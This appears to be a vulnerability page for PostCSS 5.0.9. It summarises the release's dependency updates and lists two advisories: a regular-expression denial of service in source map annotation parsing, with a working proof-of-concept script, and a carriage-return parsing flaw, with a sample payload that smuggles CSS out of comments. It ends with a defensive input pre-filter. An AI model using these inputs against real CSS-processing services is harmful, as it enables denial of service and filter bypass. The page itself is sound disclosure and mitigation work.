PostCSS version 5.0.9 is a minor update to the popular JavaScript tool for transforming styles with plugins, building on version 5.0.8. The core description is unchanged; what distinguishes the two releases is a set of dependency updates and internal tooling changes. A key dependency update moves the source-map package from version 0.5.0 to 0.5.1, which may improve source map generation and debugging support for developers. Among development dependencies, several changes are notable. Sinon, a testing utility, moves from version 1.16.1 to 1.17.1. ESLint, a JavaScript linter, goes from version 1.5.0 to 1.6.0, likely bringing new linting rules and code style checks. Isparta, a code coverage tool, is updated from 3.0.4 to 3.1.0, which may improve coverage reporting. In the build tooling, gulp-shell is upgraded from version 0.4.3 to 0.5.0, run-sequence from 1.1.3 to 1.1.4, and gulp-istanbul from 0.10.0 to 0.10.1, which may affect build processes and task execution. Finally, concat-with-sourcemaps has been updated from 1.0.2 to 1.0.4. Together these updates point to a focus on the development workflow, testing environment, and code quality around PostCSS. Developers upgrading from 5.0.8 should review the changelog of each updated development dependency to understand the specific changes and their potential impact on projects using PostCSS.
All vulnerabilities related to version 5.0.9 of the package
Regular Expression Denial of Service in postcss
The package postcss, in versions before 7.0.36 or between 8.0.0 and 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
// Proof of concept from the advisory: build_attack(n) repeats the annotation
// prefix n times with no closing "*/", and the loop times how long
// postcss.parse() takes as n grows.
var postcss = require("postcss")

function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      // A parse error still counts: the time was spent before it was thrown.
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.
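An added example, not code from the PostCSS project or from either advisory: a pre-filter for CSS from an untrusted source, applied before postcss.parse(), that addresses both advisories above by counting sourceMappingURL= annotations with a linear scan (so repeated-annotation inputs like the proof of concept are rejected) and collapsing \r and \r\n to \n so a lone carriage return never reaches the tokenizer. The function names and limits are assumptions; upgrading PostCSS remains the actual fix, and this is defence in depth for consumers still on 5.x.

```javascript
// Added example (not PostCSS code): input hygiene for untrusted CSS, run before
// the string is handed to postcss.parse() on a vulnerable version.

const ANNOTATION = 'sourceMappingURL=';

// Linear-time count of source map annotations. The vulnerable regex in
// previous-map.js backtracks across repeated "/*# sourceMappingURL=" runs;
// indexOf() never backtracks, so this check is safe on attacker input.
function countAnnotations(css) {
  let count = 0;
  for (let pos = css.indexOf(ANNOTATION); pos !== -1;
       pos = css.indexOf(ANNOTATION, pos + ANNOTATION.length)) {
    count += 1;
  }
  return count;
}

// Collapse CRLF and lone CR to LF so no bare "\r" reaches the tokenizer,
// which is the character the @font-face{ font:(\r/*);} case depends on.
// The pattern has no nested quantifier, so it runs in linear time.
function normalizeLineEndings(css) {
  return css.replace(/\r\n?/g, '\n');
}

// Returns { ok, css } or { ok, reason }. The defaults are constructed limits,
// not PostCSS settings: a stylesheet from an untrusted source has no business
// pointing the parser at a source map at all, hence maxAnnotations = 0.
function prepareUntrustedCss(css, { maxLength = 1 << 20, maxAnnotations = 0 } = {}) {
  if (typeof css !== 'string') return { ok: false, reason: 'not a string' };
  if (css.length > maxLength) return { ok: false, reason: 'too long' };
  const annotations = countAnnotations(css);
  if (annotations > maxAnnotations) {
    return { ok: false, reason: `${annotations} source map annotations` };
  }
  return { ok: true, css: normalizeLineEndings(css) };
}

if (typeof module !== 'undefined') {
  module.exports = { countAnnotations, normalizeLineEndings, prepareUntrustedCss };
}
```

Pass the returned css to postcss.parse() only when ok is true; the rejected inputs are the ones that would otherwise be fed to the vulnerable code paths.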